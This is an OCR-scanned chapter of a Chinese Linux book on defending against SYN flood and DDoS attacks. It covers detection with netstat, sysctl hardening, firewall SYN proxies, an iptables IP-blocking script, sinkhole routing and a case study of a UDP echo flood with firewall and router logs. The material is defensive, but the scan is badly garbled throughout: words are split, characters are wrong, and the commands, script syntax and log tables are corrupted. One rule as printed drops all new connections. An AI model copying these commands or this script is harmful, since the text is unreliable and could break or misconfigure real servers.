认 ， 等 待 客户 的 确认 和 包 。 这 些 条 目 所 标识 的 连接 是 在 服务 器 处 于 SYN-RECYV 状态 时 ， 
当 服 务 器 收 到 客户 的 确认 包 时 删除 这 些 条 目 ， 服 务 器 进入 ESTABLISHED 状态 。 
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@ Backlog 参数 。 表 示 未 连接 队列 的 最 大 容纳 数目 。 

@ SYN+ACK 重 传 次 数 。 服 务 器 发 送 完 SYN+ACK 包 ， 如 果 未 收 到 客户 确认 包 ， 则 服务 
器 进行 首次 重 传 。 再 等 待 一 段 时 间 后 仍 未 收 到 客户 确认 包 ， 则 进行 第 二 次 重 传 。 如 果 
重 传 次 数 超过 系统 规定 的 最 大 重 传 次 数 时 ， 则 系统 将 该 连接 信息 从 半 连 接 队列 中 删 
除 。 注 意 ， 每 次 重 传 等待 的 时 间 不 一 定 相同 。 

@ 半 连 接 存活 时 间 。 指 半 连 接 队列 条 目 存 活 的 最 长 时 间 ， 即 服务 从 收 到 SYN 包 到 确认 
这 个 报 文 无 效 的 最 长 时 间 。 该 时 间 值 是 所 有 重 传 请 求 包 的 最 长 等 待 时 间 总 和 ， 有 时 也 
称 半 连接 存活 时 间 为 Timeout 时 间或 SYN-RECYV 存活 时 间 。 


TCP-SYN Flood 又 称 半 开 式 连接 攻击 。 攻 击 者 会 利用 一 些 特殊 工具 制造 大 量 的 非法 数据 
包 , 把 源 地 址 伪装 成 一 个 实际 不 存在 的 地 址 。 在 它 的 实现 过 程 中 只 有 前 两 个 步骤 ， 当 服务 方 收 
到 请 求 方 的 SYN 并 回 送 SYN+ACK 确认 消息 后 , 请 求 方 由 于 采用 源 地 址 欺骗 等 手段 , 致使 服 
务 方 根本 得 不 到 ACK 回应 。 

事实 上 ， 请 求 方 除 了 立即 响应 SYN+ACK 消息 外 ， 也 可 能 因为 正在 处 理 某 些 数 据 ， 而 暂 
时 无 法 响应 服务 端 消 息 , 这 是 正常 的 。 因此 , 在 系统 设计 中 考虑 让 服务 器 持续 一 段 时 间 保 留 此 
SYN+ACK 信息 片断 ， 等 待 接收 请 求 方 ACK 消息 的 设计 是 很 有 必要 的 。 但 是 ， 一 台 服 务 器 可 
用 的 TCP 连接 是 有 限 的 ， 如 果 恶 意 攻击 方 快 速 、 连 续 地 发 送 此 类 连接 请 求 ， 则 服务 器 的 可 用 
TCP 连接 队列 很 快 会 被 阻塞 ， 系 统 可 用 资源 、 网 络 可 用 带宽 将 急剧 下 降 ， 因 而 无 法 向 其 他 用 
户 提供 正常 的 网 络 服务 。TCP-SYN Flood 就 是 利用 这 一 原理 实施 攻击 的 。 

这 种 方式 有 它 的 局 限 性 。 虽 然 攻击 者 可 以 将 卫 伪造 为 不 存在 的 源 地 址 ， 但 不 存在 的 源 地 
址 也 相对 容易 被 管理 员 识 别 。 有 经 验 的 管理 员 可 以 通过 查看 连接 状态 ， 把 连接 频繁 的 攻击 源 
用 iptables 脚本 直接 过 滤 ， 所 以 ， 此 类 攻击 方式 现在 也 有 所 改变 。 有 心 的 攻击 者 往往 会 精心 准 
备 一 群 攻击 机 ， 同 时 发 动 攻击 ， 这 样 就 会 有 成 百 上 千 个 攻击 源 ， 每 个 攻击 源 都 在 不 同 的 网 络 。 
再 将 每 一 个 攻击 源 伪装 上 随机 的 人 P 源 地 址 ， 这 样 管理 员 就 更 难 应 付 了 。 


1.9.2 ”DDoS 的 检测 方法 
下 面 介 绍 如 何 判断 服务 器 是 否 受 到 DDoS 攻击 。 可 使 用 如 下 几 个 简单 的 步骤 进行 判断 。 


最 明显 的 感觉 是 服务 器 响应 缓慢 ， 一 般 可 以 直接 从 服务 器 提供 的 页 面 显示 速度 上 
加 登录 服务 器 ， 用 netstat 命令 查看 ， 发 现 服务 器 有 大 量 等 待 的 TCP 连接 。 
加 利用 sniffer、Tcpdump 等 噬 探 工具 会 发 现 网 络 中 充斥 着 大 量 源 地 址 为 假 的 伪装 数 
据 包 。 
园 从 ISP 上 可 以 看 出 服务 器 的 数据 流量 猛 增 , 造成 网 络 拥塞 , 服务 器 甚至 不 能 正常 地 与 
外 界 通信 。 


DDoS 攻击 严重 时 会 造成 系统 死机 。 
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以 一 台 RHEL AS 4.0 的 服务 器 为 例 , 使 用 系统 自 带 的 netstat 工具 来 检测 DDoS 攻击 : 


:23 124.173.152.8:25882 SYN RECV- 
:23 236.15.133.204:2577 SYN_RECV- 
:23 127.160.6.129:51748 SYN RECV- 
:23 222.220.13.25:47393 SYN RECV- 
:23 212.200.204.182:60427 SYN RECV- 
:23 232.115.18.38:27811 SYN RECV- 
:23 239.116.95.96:5122 SYN RECV- 


上 面 是 在 Linux 系统 中 看 到 的 输出 结果 ， 很 多 连接 处 于 SYN-RECYV 状态 (在 Windows 系 
统 中 是 SYN-RECEIVED 状态 ), 源 他 地 址 都 是 随机 的 (也 可 能 是 同一 个 IP 的 很 多 SYN-RECV 
连接 状态 ) ， 表 明 这 是 一 种 带 有 IP 欺骗 的 SYN 攻击 。 通 过 下 面 的 命令 也 可 以 直接 查看 Linux 
环境 下 某 个 端口 的 未 连接 队列 条 目 数 : 


#netstat -atun |grep SYN RECV 1grep:80 |wc -1 


结果 显示 了 TCP 80 端口 的 未 连接 数 请 求 及 个 数 ， 虽 然 还 远 未 达到 系统 极限 ， 但 应 该 引起 
管理 员 的 注意 。 


1.9.3 防范 DDoS 攻击 


几乎 所 有 的 主机 平台 都 有 抵御 DDoS 的 设置 。 以 Linux 操作 系统 为 例 ,其 防范 技术 主要 分 
为 三 大 类 ， 第 一 类 是 通过 合理 配置 系统 ， 达 到 资源 最 优化 和 利用 最 大 化 ; 第 二 类 是 通过 加 固 
TCP/IP 协议 栈 来 防范 DDoS; 第 三 类 是 通过 防火 墙 、 路 由 器 等 过 滤 网 关 ， 有 效 地 探测 攻击 类 
型 并 阻击 攻击 。 

必须 明确 的 是 ，DDoS 攻击 在 TCP 连接 原理 上 是 合法 的 ， 除 非 TCP 协议 重新 设计 ， 明 确 
定义 DDoS 和 其 他 正常 请 求 有 何不 同 ， 否 则 不 可 能 完全 阻止 DDoS 攻击 ， 我 们 所 做 的 只 是 尽 
可 能 地 减轻 DDoS 攻击 的 危害 。 


1. 服务 器 设置 
除了 防范 他 人 攻击 外 ， 也 要 提防 不 要 成 为 被 人 利用 的 对 象 。 可 以 通过 以 下 方法 来 实现 : 


@ 安全 配置 系统 ， 杜 绝 攻击 漏洞 ， 及 时 安装 系统 补丁 程序 。 
@ 关闭 不 必要 的 服务 ， 并 优化 服务 。 


有 规律 的 查看 日 志 。 


@ 利用 工具 检查 文件 的 完整 性 。 


2. 加 固 TCP/IP 协议 栈 
这 里 通过 修改 TCP/IP 参数 来 控制 连接 资源 。 
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(1) SYN Cookies 技术 
用 于 限制 同时 打开 的 SYN 半 连 接 数 。 以 Red Hat Linux 为 例 ， 通 过 在 启动 环境 中 设置 以 
下 命令 来 启用 SYN Cookies: 


#echo 1> /proc/sys/net/ipv4/tcp_ syncookies 
也 可 以 通过 修改 其 他 参数 ， 或 者 使 用 “/proc/sys/net/ipv4/netfilter/ip_contrack *” 来 实现 。 


(2) 增加 最 大 半 连 接 数 
这 个 是 指 加 大 未 连接 队列 空间 。Linux 使 用 变量 tcp-max-syn_backlog 来 定义 backlog 队列 
容纳 的 最 大 半 连 接 数 。 在 Red Hat Linux 中 ， 该 变量 的 默认 值 为 256， 在 RHEL AS Linux 中 则 
是 1024。 该 数值 是 远 远 不 够 的 ， 一 次 强度 不 大 的 SYN 攻击 就 能 使 半 连 接 队列 占 满 。 通 过 以 下 
命令 可 以 修改 此 变量 值 : 


#sysctl -W net.ipv4.tcp max syn backlog="2048" 


(3) 缩短 SYN 半 连 接 的 Timeout 时 间 
Red Hat Linux 使 用 变量 tcp_synack_retries 定义 重 传 次 数 , 其 默认 值 是 5, 总 超时 时 间 需 要 
3 分 钟 。 通 过 以 下 命令 可 以 修改 此 变量 值 : 


#sysctl -W net.ipv4.tcp synack retries="0" 


(4) 及 时 更 新 系统 补丁 
可 以 添加 如 下 脚本 到 Linux 的 /etc/sysctl.conf 文件 ， 重 启 后 会 自动 启动 ， 即 可 达到 防御 
DDoS 的 效果 : 
## add by geminis for syn crack 
net.ipv4.tcp_ syncookied=1 


net.ipv4.tcp max_ syn backlog="2048" 
net.ipv4.tcp_ synack retries="1" 


3. 防火 墙 防御 


网 关 超 时 设置 将 防火 墙 SYN 转发 超时 参数 设置 为 小 于 服务 器 的 Timeout。 如 果 客 户 端 在 防火 
墙 的 Timeout 时 间 内 无 响应 ， 防 火 墙 将 发 送 终 止 RST 消息 给 服务 器 ， 使 服务 器 从 队列 中 删除 该 半 
连接 ， 从 而 节省 开销 。 需 要 注意 的 是 ， 网 关 超 时 参数 设置 不 宜 过 小 ， 也 不 宜 过 大 ， 超 时 参数 设置 
过 小 会 影响 正常 的 通信 , 设置 过 大 则 会 影响 防范 SYN Drome 攻击 的 效果 , 必须 视 所 处 的 网 络 环境 
来 设置 参数 。 

@ SYN 网 关 : SYN 网 关 的 原理 是 代替 客户 端 发 送 ACK 消息 ， 然 后 转发 数据 。SYN 网 

关 收 到 服务 器 的 SYN/ACK 包 后 ， 将 该 包 转 发 给 客户 端 ， 同 时 以 客户 端的 名 义 给 服务 
器 发 ACK 确认 包 。 此 时 ， 服 务 器 由 半 连 接 状 态 进入 连接 状态 。 当 客户 端 确认 包 到 达 
时 ， 如 果 有 数据 则 转发 ， 否 则 丢弃 。 一 般 服务 器 所 能 承受 的 连接 数量 比 半 连 接 数 量 要 
大 得 多 ， 所 以 这 种 方法 能 有 效 地 减轻 对 服务 器 的 攻击 。 


Linux ”企业 应 用 案例 精 解 


@ SYN 代理 : 当 客户 端 SYN 包 到 达 过 滤 网 关 时 ，SYN 代理 并 不 转发 SYN 包 ， 而 是 以 
服务 器 的 名 义 主动 回复 SYN+ACK 包 给 客户 。 收 到 客户 的 ACK 包 表 明 是 正常 访问 ， 
此 时 防火 墙 向 服务 器 发 送 ACK 包 ， 并 完成 三 次 握手 。 这 里 的 防火 墙 作为 独立 的 服务 
器 ， 需 要 有 较 强 的 抵抗 DDoS 攻击 能 力 。 使 用 专用 NP ( 网 络 处 理 器 ) 及 专用 操作 系 
统 的 高 档 防 火 墙 都 会 具备 这 种 功能 。 


下 面 给 出 一 段 脚本 ， 用 于 防止 恶意 连接 : 


#!/bin/sh 

# 定 义 变量 

MAX_TOTAL SYN_ RECV="1000" 

MAX_PER IP_ SYN RECV="20" 

MARK="SYN_RECV™" 

# 定 义 链接 状态 为 "SYN_RECV" 

PORT="80" 

LOGFILE="/var/og/netstat $MARK-$PORT" 

LOGFILE IP="/var/log/netstat connect ip.1log" 

DROP_IP LOG="/var/log/netstat syn drop ip.1log" 

#iptables 初始 化 ， 拒 绝 非法 包 和 不 明 状态 包 ， 人 允许 请 求 包 和 已 连接 的 包 进入 
iptable -EF -t filter 

iptable -A INPUT -p TCP --syn -mm stat --state NEW -jij DROP 
iptables -A INPUT -p ALL - m state --state INVALID -j DROP 
iptables -A INPUT -p ALL -m state -state ESTABLISHED,RELATED -j ACCEPT 
# 初 始 化 变量 

if [-z $MARK] ;then 

MARK="LISTEN" 

生出 

if [-z $PORT] ;then 

SPRT="tcp" 

else 

SPORT=" :SPORT" 

和 去 

#end 

# 保 存 netstat 结果 到 指定 记录 文件 中 便于 分 析 

netstat -atunlgrep $MARK |grep $SPORT 2>/dev/null >$LOGFILE 
if [-s $DROP_IP LOG] ?then 

for i in “less$DROP IP LOG|awk '{print $1}°; 

do 

/sbin/iptables -A INPUT -p ALL -s $i -j DROP 

done 

正二 

for i in "less $LOGFILE IP'; 

# 统 计 同 一 IP 的 SYN-RECYV 状态 

REPEAT CONNECT NUM="'grep $i $LOGFILE|wC -1"' 

# 如 果 超 过 预 设 的 统一 IP 连接 数 ， 则 拒绝 此 IP 连接 包 进入 

if [$REPEAT CONNECT NUM -gt $MAX PER IP SYN RECV] ;then 
echo "$I $REPEAT CONNEC NUM" >> $DROP IP LOG 

iptables -A INPUT -p ALL -s $i -j DROP 
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fi 

done 

# 统 计 所 有 状态 为 SYN_RECY 的 数据 包 ， 如 果 数 量 超过 预 设 则 重 置 状态 
ALL CONNETC="'uniq -u $LOGFILE|wc -1 " 

echo $ALL CONNECT 

if [$ALL CONNECT -gt $MAX TOTAL SYN REC] ;then 

echo $ALL CONNECT 

exit 

£i 


简单 说 明 一 下 上 述 脚本 : 该 脚本 一 旦 发 现 有 恶意 连接 的 他 地 址 后 会 马上 生效 ， 利 用 iptables 命 
令 阻 止 该 他 地 址 的 任何 请 求 , 直到 管理 员 手 动 去 除 为 止 。 但 是 这 种 做 法 在 某 些 情况 下 显得 过 于 严格 ， 
因为 该 他 也 可 能 是 一 个 公共 出 口 。 解 决 方法 是 再 配合 一 个 释放 他， 运行 于 cron 服务 中 ， 设 置 成 每 
隔 一 段 时 间 自 动 从 iptables 规则 中 去 掉 该 他 地 址 ， 时 间 可 以 根据 具体 网 络 连接 的 情况 进行 设置 。 


1.9.4 基于 角色 的 防范 


互联 网 上 的 用 户 各 种 各 样 ， 不 同 角色 有 着 不 同 的 任务 。 下 面 以 企业 网 络 管理 员 /系统 管理 
员 、ISP/ICP 管理 员 和 骨干 网 络 运营 商 三 种 角色 为 例 分 别 介绍 如 何 防范 Linux 下 的 DDoS 攻击 。 


1. 企业 网 络 管理 员 / 系 统管 理 员 
作为 企业 网 络 /系统 管理 员 ， 有 责任 做 到 对 系统 了 如 指 掌 ， 以 下 几 项 工作 是 必须 要 进行 的 。 


(1) 时 刻 留 意 安全 站 点 公布 的 、 与 Linux 系统 和 软件 有 关 的 最 新 安全 漏洞 和 报告 ， 及 早 
发 现 系统 存在 的 攻击 漏洞 ， 及 时 安装 系统 补丁 程序 ; 对 一 些 重要 信息 (例如 系统 配置 信息 ) 建 
立 并 完善 备份 机 制 对 一 些 特权 账号 (例如 管理 员 账 号 ) 的 密码 设置 要 谨慎 。 通 过 这 样 的 一 系 
列举 措 可 以 把 攻击 者 的 机 会 降 到 最 小 。 

(2) 在 网 络 管理 方面 ， 要 经 常 检查 系统 的 物理 环境 ， 禁 止 那些 不 必要 的 网 络 服务 ， 充 分 了 解 
系统 和 服务 器 软件 是 如 何 工作 的 ， 经 常 检查 系统 配置 和 安全 策略 ， 并 注意 查看 每 天 的 安全 日 志 。 

(3) 利用 工具 检查 文件 完整 性 。 在 确定 系统 未 曾 被 入 侵 时 ， 应 该 尽快 为 所 有 二 进 制程 序 
和 其 他 重要 系统 文件 产生 文件 签名 ,并 且 周 期 性 地 进行 比较 以 确保 没有 被 非法 修改 。 另 外 , 强 
烈 推荐 将 文件 检验 和 保存 到 另 一 台 主机 或 可 移动 介质 中 。 工 具 可 以 使 用 免费 的 tripwire 和 aide 
等 文件 /目录 完整 性 检查 程序 ; 有 条 件 的 话 也 可 以 选择 购买 商业 软件 包 。 如果 使 用 基于 RPM 的 
软件 包 ， 可 以 直接 使 用 RPM 的 检验 功能 来 校 验 软件 特征 码 。 

(4) 利用 网 络 安全 设备 〈 例 如 防火 墙 ) 来 加 固 网 络 的 安全 性 ， 配 置 好 这 些 设备 的 安全 规 
则 ,过滤 掉 所 有 可 能 的 伪造 数据 包 。 一 般 商业 公司 都 会 配备 相应 的 防火 墙 设备 。 目 前 市 场 上 无 
论 IDS 还 是 IPS 都 具备 防范 DDoS 攻击 的 功能 ， 购 买 时 多 比较 相关 数据 处 理 能 力 、 数 据 包 否 
吐 量 和 转发 等 性 能 指标 来 进行 选择 。 

(5) 经 常 与 IDC 中 心 管理 员 沟 通 ， 以 及 与 主要 互联 网 服务 供应 商 〈ISP) 的 协助 和 合作 
是 非常 重要 的 。 因 为 DDoS 攻击 主要 是 耗 用 带宽 ， 虽 然 攻击 来 自 四面 八 方 ， 但 进入 上 游 ISP 
网 络 的 入 口 点 是 有 限 的 。 个 人 管理 的 网 络 无 法 单独 对 付 这 些 攻击 ， 可 以 与 ISP 协商 , 通过 他 们 
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的 帮助 采用 正确 的 路 由 访问 控制 策略 来 保护 带宽 和 内 部 网 络 ,实现 路 由 访问 控制 和 对 带宽 总 量 
的 限制 。 

(6) 当 发 现 自己 正在 遭受 DDoS 攻击 时 ， 应 当局 动 应 对 策略 ， 如 采用 网 络 数据 包 嗅 探 工 
具 ， 尽 可 能 快 地 追踪 攻击 包 ， 保 存 好 攻击 日 志文 件 ， 并 且 及 时 联系 ISP 和 应 急 组 织 ， 分 析 受 影 
响 系统 ， 确 定 涉 及 的 其 他 节点 ， 从 而 阻挡 来 自己 知 攻击 节点 的 流量 。 


2.ISP/ICP 管理 员 


ISP/ICP 为 中 小 型 企业 提供 各 种 规模 的 主机 托管 业务 ， 所 以 在 防范 DDoS 时 ， 除 了 需要 与 
企业 网 络 管理 员 一 样 管 理 好 主机 外 ， 还 要 特别 注意 自己 管理 范围 内 的 客户 托管 主机 不 要 成 为 
“肉鸡 ”， 同 时 注意 保护 自己 的 网 络 设 备 。 

针对 ISP 的 网 络 攻击 越 来 越 多 , 应 付 这 些 攻击 除了 自身 技术 水 平 高 之 外 , 还 需要 丰富 的 攻 
防 经 验 和 事 半 倍 功 的 工作 设备 ， 从 而 分 析 网 络 流量 ， 采 取 应 对 措施 。 

目前 ， 比 较 流 行 的 防范 方法 是 “网 络 下 水 道 技术 ”。“ 网 络 下 水 道 技术 ”应 用 网 络 上 
的 Honey Pot 收集 发 向 ISP 的 垃圾 流量 ， 并 通过 对 这 些 垃圾 信息 的 分 析 来 判断 是 否 有 人 在 
扫描 网 络 或 进行 攻击 ， 从 而 实现 预警 和 防范 功能 。 如 果 有 攻击 者 正在 对 ISP 网 络 展开 攻击 ， 
“网 络 下 水 道 技术 ”可 将 攻击 的 网 络 流量 引导 至 “下 水 道 ”， 通 过 一 台 路 由 来 实现 ， 可 以 
是 默认 的 路 由 ， 也 可 以 是 一 个 特定 的 子 网 ，ISP 网 络 无 法 识别 的 网 络 流量 都 会 送 到 这 里 。 
对 于 ISP 来 说 ， 这 些 网 络 流量 可 能 隐藏 着 许多 有 用 的 信息 ， 想 要 获取 这 些 信息 可 以 在 路 由 
后 面 加 上 一 个 网 络 分 析 器 ， 如 Linux 下 著名 的 IDS 软件 Snort， 并 配合 Tcpdump 协议 分 析 
工具 ， 就 可 实现 数据 的 截取 和 分 析 。 如 果 ISP 在 监视 过 程 中 发 现 有 攻击 者 正在 攻击 一 个 子 
网 的 网 段 ， 可 以 用 BGP 通知 其 他 路 由 ， 把 指向 该 子 网 的 网 络 流量 都 送 到 下 水 道路 由 ， 从 而 
改变 攻击 方向 。“ 下 水 道 ” 技 术 如 图 1.4 和 图 1.5 所 示 。 


图 1.4 “下 水 道 ” 技 术 原 理 图 
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攻击 目标 
服务 器 


图 1.5 “下 水 道 ”技术 实施 


假设 攻击 者 正在 对 一 个 子 网 进行 攻击 ， 网 络 流量 经 过 ISP 网 络 后 被 ISP 管理 员 发 现 ，ISP 
管理 员 就 可 以 及 时 采取 措施 ， 利 用 网 络 下 水 道 技术 向 相 邻 BGP 发 送 一 个 下 水 道路 由 记录 。 于 
是 针对 该 子 网 的 攻击 被 改 向 ， 从 而 保护 该 子 网 。 


3. 骨干 网 络 运 营 商 IDC 


骨干 网 络 运营 商 IDC 提供 互联 网 的 物理 基础 。 通 过 骨干 网 络 运营 商 , DDoS 攻击 可 以 很 好 
地 被 预防 。2000 年 Yahoo 等 知名 网 站 被 攻击 后 ， 美 国 网 络 安全 研究 机 构 就 提出 了 骨干 网 络 运 
营 商 联手 解决 DDoS 攻击 的 方案 。 该 方法 其 实 很 简单 ， 就 是 在 每 家 运营 商 的 出 口 路 由 器 上 进 
行 源 瑟 地 址 验证 ， 如 果 在 自己 的 路 由 表 中 没有 这 个 数据 包 源 下 的 路 由 就 丢弃 这 个 包 。 这 种 
方法 可 以 阻止 攻击 者 利用 伪造 的 源 瑟 进行 DDoS 攻击 。 但 是 ， 这 样 会 降低 路 由 器 的 效率 ， 而 
这 是 骨干 运营 商 非 常 关注 的 问题 ， 所 以 该 方案 真正 实施 起 来 还 很 困难 。 

事实 上 , IDC 更 多 地 是 通过 高 端 设备 , 例如 高 端 路 由 器 、 网 络 监 控 设备 和 事件 告警 应 急 设 
备 等 来 防范 DDoS 等 攻击 ， 保 证 网 络 完全 。 


1.9.5 小结 


DDoS 防范 需要 不 断 改进 ， 对 DDoS 的 原理 与 应 对 方法 需要 持续 性 的 关注 和 研究 。 目 前 已 
有 证 据 显 示 DDoS 攻击 方式 已 经 改进 ， 因 此 防范 工作 也 要 随 之 不 断 改进 。 


1.10 ”案例 实战 : 网 站 遭遇 DDoS 攻击 


1.10.1 事件 发 生 
2011 年 春节 长 假 刚 过 完 ，Web 就 出 现 故 障 ， 下 午 1 点 午饭 回来 ， 笔 者 立即 将 桌面 解锁 
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并 习惯 性 的 检查 了 Web 服务 器 。 通 过 查看 Web 服务 器 性 能 监视 软件 图 像 显示 的 向 下 滑行 
的 红色 曲线 看 到 Web 出 现 问题 了 。 

根据 上 述 问题 ， 笔 者 马上 开始 核查 Web 服务 器 的 日 志 ， 查 看 是 否 能 检测 到 问题 究竟 是 
什么 时 候 开始 的 ， 或 者 发 现 一 些 关 于 引起 中 断 的 线索 。 就 在 查询 线索 的 过 程 中 ， 公 司 首席 
信息 官 〈《CIO) 告诉 我 ， 他 已 经 接 到 客户 的 投诉 电话 ， 说 无 法 访问 网 站 了 。 于 是 从 台式 机 
中 敲 入 网 站 地 址 ， 试 着 从 台式 电脑 访问 客户 网 站 时 ， 看 到 的 只 是 无 法 显示 此 页 面 的 消息 。 

回想 前 几 天 未 对 Web 服务 器 做 过 任何 改变 ， 服 务 器 也 未 出 现 过 性 能 问题 ， 在 Web 服 
务 器 的 日 志文 件 中 也 没有 发 现任 何 可 疑 之 处 ， 因 此 接 下 来 笔者 仔细 查看 防火 墙 日 志和 路 由 
器 日 志 , 并 打印 出 了 那 台 服务 器 出 问题 时 的 记录 。 过 滤 掉 正常 的 流量 并 保留 下 可 疑 的 记录 。 
打印 出 来 的 结果 如 表 1.1 所 示 。 


表 1.1 防火 墙 日 志 
源 IP 地 址 目的 端口 号 。 | 协议 
172.16.45.2 192.168.0.175 记 
10.166.166.166 192.168.0.175 [ls | 17 
10.168.45.3 192.168.0.175 7 17 
10.166.166.166 192.168.0.175 [ls | 17 
192.168.89.111 192.168.0.175 7 17 
10.166.166.166 192.168.0.175 | 17 
10.231.76.8 192.168.0.175 了 17 
192.168.15.12 192.168.0.175 17 
10.166.166.166 192.168.0.175 ls | 17 
172.16.43.131 192.168.0.175 7 17 
10.23.67.9 192.168.0.175 本 17 
10.166.166.166 192.768.0.75 [ls |， 17 
192.168.57.2 192.168.0.175 7 17 
172.16.87.11 192.768.0.75 六 17 
10.166.166.166 192.168.0.175 19 7 17 
10.34.67.89 192.168.0.175 gt 17 
10.65.34.54 192.168.0.175 7 17 
192.168.25.6 192.168.0.175 党 17 
172.16.56.15 192.168.0.175 党 
10.166.166.166 192.168.0.175 7 17 


之 后 在 路 由 器 日 志 上 做 了 同样 的 工作 ， 并 打印 出 了 看 上 去 异常 的 记录 ， 如 图 1.6 所 示 。 
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Fouter#oh ip cache flow 
IP Packet sire distribution (567238991 total packets): 
32 64 96 128 160 192 224 256 238 32) 352 384 416 448 


1 如 2 

Tcp-FTPD 1983 oo 1 40 00 0.2 11.3 
Tep-Wy 3563 D2 1 58 15 61 3.2 
Tp Tez 00 1 本 0%0 10 12.2 
TCP-X lg 0%0 1 如 00 05 1 

Tp-Bop le 00 1 40 90 02 11.5 
TPR 2905 00 1 0 90 601 11.2 
Tp-Frag 108 00 2 3 00 14 15.7 
Tep-other 。 4992811 O01 1 40 65.5 0.4 28.7 
TDp-DNS 10M5 00 1 BH 00 69 18.0 
wr-NP 029 00 1 1 00 9.5 11.8 
WP-TFTP S21 00 2 如 00 19 1.1 
UDP-Frag 25 00 1 4 0.0 251.4 14.7 
UDP-other 。 182921340 39.2 1 1 da.1 0.5 12.0 
Jo 189%457 0.0 10 64 05 19 14.7 
TGF EE 00 1569 Ml 0.0 14.5 6. 

Tp-ether 7 00 1 A 00 19.7 16.9 


图 1.6 攻击 期 间 的 路 由 器 日 志 


路 由 器 日 志 的 参数 解释 如 下 : 


IP packet size distribution: 该 标题 下 的 两 行 显示 了 数据 包 按 大 小 范围 分 布 的 百分率 。 这 
里 显示 的 内 容 表 明 98.4% 的 数据 包 的 大 小 在 33~64Bytes 之 间 。 

Protocol: 协议 名 称 。 

Total Flows: 自从 最 后 一 次 清除 统计 信息 后 ， 这 种 协议 的 信息 流 的 个 数 。 

Flows/Sec: 每 秒 出 现 这 种 协议 的 信息 流 的 平均 个 数 ,等 于 总 信息 流 数 /综合 时 间 的 秒 数 。 
Packets/Flow: 遵守 这 种 协议 的 信息 流 中 平均 的 数据 包 数 。 等 于 这 种 协议 的 数据 包 数 ， 
或 者 在 这 段 综合 时 间 内 ， 这 种 协议 的 信息 流 数 。 

Bytes/Pkt: 遵守 这 种 协议 的 数据 包 的 平均 字 节 数 (等 于 这 种 协议 的 总 字 节 数 ， 或 者 在 
这 段 综合 时 间 内 ， 这 种 协议 的 数据 包 数 )。 

Packets/Sec: 每 秒 这 种 协议 的 平均 数据 包 数 (等 于 这 种 协议 的 总 数据 包 )， 或 者 这 段 综 
合 时 间 的 总 秒 数 。 

Active(Sec)/Flow: 从 第 一 个 数据 包 到 终止 信息 流 的 最 后 一 个 数据 包 的 总 时 间 (以 秒 为 
单位 ， 比 如 TCPFIN， 终 止 时 间 量 等 )， 或 者 这 段 综合 时 间 内 这 种 协议 总 的 信息 流 数 。 
Idle(Sec)/Flow: 从 这 种 协议 的 各 个 非 终 止 信息 流 的 最 后 一 个 数据 包 起 ， 直 到 输入 这 一 
命令 时 止 的 时 间 总 和 (以 秒 为 单位 )， 或 者 这 段 综 合 时 间 内 信息 流 的 总 时 间 长 度 。 


笔者 打印 了 在 Web 服务 器 出 现 问题 的 前 几 周 保存 的 缓存 数据 ， 可 以 用 它 作 为 标准 进行 参 
照 ， 如 图 1.7 所 示 。 
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routerl#sh ip cache flov 
IP packet size distribution (567238991 total packets): 

132 64 96 128 160 192 224 256 288 320 352 384 416 448 
.000 .002 .002 .002 .000 .000 .000 .000 .000 .000 .000 .000 .000 .000 
480 512 544 576 1024 1536 2048 2560 3072 3584 4096 4608 

.000 .000 .002 .012 .006 .974 .000 .000 .000 .000 .000 .000 

IP Flow Switching Cache, 529842 bytes 

2092 active，50378 inactive, 8924 added 

32341 ager polls, 0 flow alloc failures 

Active flows tineout in 30 ninutes 

Inactive flows tineout in 15 seconds 

last clearing of statistics never 

Protocol Total Flows Packets Bytes Packets Active(Sec) Idle(Sec) 


Flows /sec /Flov /Pkt /sec /Flow /Flow 
TCP-Telnet 1243 0.0 1 12 0.0 0.1 LT 
TCP-FIP 3452 0.0 1 23 0.0 1.4 6.3 
TCP-FTPD ?75 0.0 1 12 0.0 0.2 2.3 
TCP-W 32467905 1.2 二 4 妇 15 0.1 5.9 
TCP-SNTP 3592 ”0.0 1 31 0.0 1.0 8.1 
TCP-X 1692 0.0 1 38 0.0 0.8 8.2 
TCP-BGP 975 0.0 32 0.0 0.2 9.5 
TCP-RNTP 1674 0.0 1 2 0.0 0.1 9.2 
TCP-Frag 103 0.0 2 23 0.0 1.0 11.7 
TCP-other 496268 0.1 1 4d1 62.2 0.5 34.2 
UDP-DRS 1342 0.0 和 43 0.0 0.9 14.9 
UDP-NTP 323 0.0 33 00 10.0 12.6 
UDP-TETP 278 0.0 2 2 0.0 8.9 9.1 
UDP-Frag 21 0.0 1 29 0.0 189.5 8.2 
UDP-other 。 5632 0.2 1 171 0.2 0.5 1.9 
ICIP 245685 0.0 10 693 0.5 8.4 12.9 
IC 21 0.0 1587 9g88 0.0 6.2 15.8 
IP-other 7 0.0 16 64 00 18.0 12.3 


图 1.7 正常 路 由 日 志 


IP packet size distribution 标题 下 的 两 行 显示 了 数据 包 按 大 小 范围 分 布 的 百分率 。 这 里 
显示 的 内 容 表 明 2% 的 数据 包 的 大 小 在 33~64Bytes 之 间 。 

从 日 志 中 可 以 注意 网 站 的 访问 量 直 线 下 降 ， 很 明显 , 在 这 段 时 间 没 人 能 访问 Web 服务 
器 。 接 下 来 ， 我 们 开始 研究 到 底 发 生 了 什么 ， 以 及 该 如 何 尽快 地 修复 。 


1.10.2 事件 分 析 


网 络 Web 服务 器 发 生 了 什么 ? 很 有 可 能 受到 了 攻击 , 那么 受到 了 什么 样 的 攻击 呢 ? 这 
一 攻击 是 对 回 显 端口 〈 即 是 端口 7) ， 不 断 发 送 小 的 UDP 数据 包 来 实现 的 。 攻 击 看 似 发 自 
两 个 策 源 地 ， 可 能 是 两 个 攻击 者 同时 使 用 不 同 的 工具 。 在 任何 情况 下 ， 超 负荷 的 数据 流 都 
会 拖 垮 Web 服务 器 。 然 而 攻击 地 址 源 不 确定 ， 不 知道 攻击 源 本 身 是 分 布 的 ,还 是 同一 个 地 
址 伪装 出 许多 不 同 的 卫 地 址 , 这 个 问题 比较 难 判断 。 假 如 源 地 址 不 是 伪装 的 , 是 真实 地 址 ， 
则 可 以 咨询 ARINI 美 国 Internet 号 码 注册 处 , 从 它 的 whois 数据 库 查 出 这 个 入 侵 卫 地 址 属 
于 哪个 网 络 。 接 下 来 只 需 联系 那个 网 络 的 管理 员 就 可 以 得 到 进一步 的 信息 。 

那么 假如 源 地 址 是 伪装 的 ， 追 踪 这 个 攻击 者 就 麻烦 得 多 。 若 使 用 的 是 Cisco 路 由 器 ， 
则 还 需 查 询 NetFlow 高 速 缓存 。NetFlow 是 Cisco 快速 转发 (CEF) 交换 框架 的 特性 之 一 。 
